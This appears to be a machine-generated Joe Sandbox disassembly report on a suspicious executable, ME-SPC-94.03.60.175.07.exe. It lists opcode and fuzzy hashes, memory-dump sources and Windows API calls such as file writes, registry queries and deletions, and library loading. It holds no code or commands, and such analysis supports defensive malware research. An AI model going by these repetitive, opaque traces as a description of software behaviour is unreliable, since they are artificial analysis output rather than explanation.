                                                  • Instruction ID: c1f18cc480c27d0a28c5d6dc1e8cd9b1e5e62e2ab7f78041d4dc85e199002e6a
                                                  • Opcode Fuzzy Hash: 148eda801716ed3d9969b88488a2fa3c6a7092fa608051ce9148cc038319d1b3
                                                  • Instruction Fuzzy Hash: 9B816731D04228DBDF24CFA8C8487ADBBB1FB44305F25816AD856BB2C1C7785A96DF84
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4983b507bd6312ae2b30a384a7c44b2e85aa51a10719cb6f4e73ba4d3199020d
                                                  • Instruction ID: 317a4f11872e46a6f39a96627fb546a7164eb21cb9e645d400dda74b69288846
                                                  • Opcode Fuzzy Hash: 4983b507bd6312ae2b30a384a7c44b2e85aa51a10719cb6f4e73ba4d3199020d
                                                  • Instruction Fuzzy Hash: 48713471D04228DFEF24CFA8C8447ADBBB1FB48305F15816AD856BB281C7785A96DF44
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 02494a79b55f78bffb2877069ace75a440f4ea31aa61c09e76d6a1b36594b02c
                                                  • Instruction ID: 7b464a411068ed62169f7738ff9b09ef3af2f2625e32a791141ed05019b82bd1
                                                  • Opcode Fuzzy Hash: 02494a79b55f78bffb2877069ace75a440f4ea31aa61c09e76d6a1b36594b02c
                                                  • Instruction Fuzzy Hash: A4714571E04228DFEF28CF98C8447ADBBB1FB48301F15816AD456BB281C7785996DF44
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e250f200d648af3f0bd61970bfe314c861a6b6aa0b25ddc882d3b39d553e7667
                                                  • Instruction ID: 924b227091e8338000478ad755e115b80dfeef44851b3a3b0f99ac33e872c674
                                                  • Opcode Fuzzy Hash: e250f200d648af3f0bd61970bfe314c861a6b6aa0b25ddc882d3b39d553e7667
                                                  • Instruction Fuzzy Hash: 07713571E04228DBEF28CF98C8447ADBBB1FF44305F15816AD856BB281C7785A96DF44
                                                  APIs
                                                  • SetFilePointer.KERNELBASE(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000,00409230,?), ref: 00403088
                                                  • WriteFile.KERNELBASE(00000000,00413E90,?,000000FF,00000000,00413E90,00004000,00409230,00409230,00000004,00000004,00000000,00000000,?,?), ref: 00403115
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: File$PointerWrite
                                                  • String ID:
                                                  • API String ID: 539440098-0
                                                  • Opcode ID: 90118ecf7a9ba7c1b0c512c54543666c71b076bc3a218e086344a49311413f62
                                                  • Instruction ID: e0bff1d0cfda9ca41153e72f66d50dbc15cd376e58f7be5246e1248deba32b17
                                                  • Opcode Fuzzy Hash: 90118ecf7a9ba7c1b0c512c54543666c71b076bc3a218e086344a49311413f62
                                                  • Instruction Fuzzy Hash: A2315971504218EBDF20CF65ED45A9F3FB8EB08755F20807AF904EA1A0D3349E40DBA9
                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000,?,000000F0), ref: 00401FC3
                                                    • Part of subcall function 004051F2: lstrlenW.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                    • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                    • Part of subcall function 004051F2: lstrcatW.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,00000000,00000000,00000000), ref: 0040524D
                                                    • Part of subcall function 004051F2: SetWindowTextW.USER32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll), ref: 0040525F
                                                    • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                    • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                    • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                  • LoadLibraryExW.KERNEL32(00000000,?,00000008,?,000000F0), ref: 00401FD4
                                                  • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,?,000000F0), ref: 00402051
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                  • String ID:
                                                  • API String ID: 334405425-0
                                                  • Opcode ID: a8461a16ac82fd46328c3b40fe1928024aef525999e2dd49edf51c7c032d1790
                                                  • Instruction ID: 409458e37c45ac75b59f5eb787cb01d488d5b476e6d1706a1798d0305ac83909
                                                  • Opcode Fuzzy Hash: a8461a16ac82fd46328c3b40fe1928024aef525999e2dd49edf51c7c032d1790
                                                  • Instruction Fuzzy Hash: A221C571904215F6CF206FA5CE48ADEBAB4AB04358F70427BF610B51E0D7B98E41DA6E
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1479157136.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000004.00000002.1479140415.0000000010000000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000004.00000002.1479171762.0000000010003000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000004.00000002.1479188233.0000000010005000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_10000000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: EnumErrorLastWindows
                                                  • String ID:
                                                  • API String ID: 14984897-0
                                                  • Opcode ID: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                  • Instruction ID: 77f315af6c145f6c632c2ebe68d3f6cdb0cf0445c85f86b19d364da59c27affc
                                                  • Opcode Fuzzy Hash: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                  • Instruction Fuzzy Hash: 8851C4B9905214DFFB20DFA4DD8675937A8EB443D0F22C42AEA04E721DCE34E990CB55
                                                  APIs
                                                    • Part of subcall function 00402C44: RegOpenKeyExW.KERNELBASE(00000000,000001D0,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                  • RegQueryValueExW.ADVAPI32(00000000,00000000,?,00000800,?,?,?,?,00000033), ref: 00402411
                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID:
                                                  • API String ID: 3677997916-0
                                                  • Opcode ID: c32cffa1c652d0f2c9f8b1d7d2b39189a889ceb323ad23ef5d1c5f54ddf36b6e
                                                  • Instruction ID: d7ada52d2c39296e820c3ca3910a3186400bd00b77f85fef4b18c2a42e671548
                                                  • Opcode Fuzzy Hash: c32cffa1c652d0f2c9f8b1d7d2b39189a889ceb323ad23ef5d1c5f54ddf36b6e
                                                  • Instruction Fuzzy Hash: 53115171915205EEDB14CFA0C6889AFB6B4EF40359F20843FE042A72D0D6B85A41DB5A
                                                  APIs
                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                  • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: fdfb5bbf2347fc35bcb13febb1c36166d701c4f92b0c5c73d87b5da78d67bd23
                                                  • Instruction ID: 092ce593f34d4cefb17b57a654468e4a57f6b0d243feea45f1431905bdcf8400
                                                  • Opcode Fuzzy Hash: fdfb5bbf2347fc35bcb13febb1c36166d701c4f92b0c5c73d87b5da78d67bd23
                                                  • Instruction Fuzzy Hash: 6F01F431B24210ABE7295B389C05B6A3698E710314F10863FF911F62F1DA78DC13CB4D
                                                  APIs
                                                    • Part of subcall function 00402C44: RegOpenKeyExW.KERNELBASE(00000000,000001D0,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                  • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004022F4
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 004022FD
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: CloseDeleteOpenValue
                                                  • String ID:
                                                  • API String ID: 849931509-0
                                                  • Opcode ID: 4bd72c51a3dc84892fe05f41f2106d015a2bbdeef4f8939a42ccf3008d047df4
                                                  • Instruction ID: 38b5be8bce117af921f4e5ecf87b48473febfbb911f594cd731ca38f4e60318c
                                                  • Opcode Fuzzy Hash: 4bd72c51a3dc84892fe05f41f2106d015a2bbdeef4f8939a42ccf3008d047df4
                                                  • Instruction Fuzzy Hash: 30F06272A04210ABEB15AFF59A4EBAE7278DB44318F20453BF201B71D1D5FC5D028A7D
                                                  APIs
                                                  • ShowWindow.USER32(00000000,00000000,?), ref: 00401DDD
                                                  • EnableWindow.USER32(00000000,00000000), ref: 00401DE8
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: Window$EnableShow
                                                  • String ID:
                                                  • API String ID: 1136574915-0
                                                  • Opcode ID: 0f4d8abf280261f43614518adab2bae4bd66ad472d4fa30d0b6c7b31f2cad2bd
                                                  • Instruction ID: 2c80559432ee8e8f64af81f0c0a70d483a1ba28b218ef0fe4a74e939514edfa0
                                                  • Opcode Fuzzy Hash: 0f4d8abf280261f43614518adab2bae4bd66ad472d4fa30d0b6c7b31f2cad2bd
                                                  • Instruction Fuzzy Hash: CEE08CB2B04104DBCB50AFF4AA889DD7378AB90369B20087BF402F10D1C2B86C009A3E
                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe,80000000,00000003), ref: 00405BB8
                                                  • CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405BDA
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: File$AttributesCreate
                                                  • String ID:
                                                  • API String ID: 415043291-0
                                                  • Opcode ID: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                                                  • Instruction ID: 50e17d5b3030c5d5ce0b1439250f6e41608f831a0cbc2ce1bc41554210f96241
                                                  • Opcode Fuzzy Hash: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                                                  • Instruction Fuzzy Hash: 48D09E71658201EFFF098F20DE16F2EBBA2EB84B00F10562CB656940E0D6715815DB16
                                                  APIs
                                                  • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 00402713
                                                    • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: FilePointerwsprintf
                                                  • String ID:
                                                  • API String ID: 327478801-0
                                                  • Opcode ID: cb0a79905901771ea4c1f75ea25e576bfed89f1d44749c98cb94dfee4278d200
                                                  • Instruction ID: 39f0610c8197233a3f531ee04e93b66353018be783afcd240567e016e4194b11
                                                  • Opcode Fuzzy Hash: cb0a79905901771ea4c1f75ea25e576bfed89f1d44749c98cb94dfee4278d200
                                                  • Instruction Fuzzy Hash: 29E01AB2B14114AADB01ABE5DD49CFEB66CEB40319F20043BF101F00D1C67959019A7E
                                                  APIs
                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040228A
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfileStringWrite
                                                  • String ID:
                                                  • API String ID: 390214022-0
                                                  • Opcode ID: ec4fb41ec1acd106f93cf616f3cd4c0d3577891546256094c6c4aadbcc0c0451
                                                  • Instruction ID: 4332bbb19f5efe4f35bb732f6f353b7f8865d75a24debaa01da2fd7198b4a795
                                                  • Opcode Fuzzy Hash: ec4fb41ec1acd106f93cf616f3cd4c0d3577891546256094c6c4aadbcc0c0451
                                                  • Instruction Fuzzy Hash: 18E04F329041246ADB113EF20E8DE7F31689B44718B24427FF551BA1C2D5BC1D434669
                                                  APIs
                                                  • RegOpenKeyExW.KERNELBASE(00000000,000001D0,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: Open
                                                  • String ID:
                                                  • API String ID: 71445658-0
                                                  • Opcode ID: b8abee58de6a0be5eb9c5c198a3cab6a4ba6a66a5c1950069b28e2d3a299ffdb
                                                  • Instruction ID: 330ade1cb5eaca6017f72c73cdc8309555cb727b7ded56d963bee508ab8c6b31
                                                  • Opcode Fuzzy Hash: b8abee58de6a0be5eb9c5c198a3cab6a4ba6a66a5c1950069b28e2d3a299ffdb
                                                  • Instruction Fuzzy Hash: A2E04676290108BADB00EFA4EE4AF9A77ECEB18704F008421B608E6091C774E9408BA8
                                                  APIs
                                                  • ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E90,0040BE90,0040330C,00409230,00409230,004031FE,00413E90,00004000,?,00000000,?), ref: 00405C4B
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
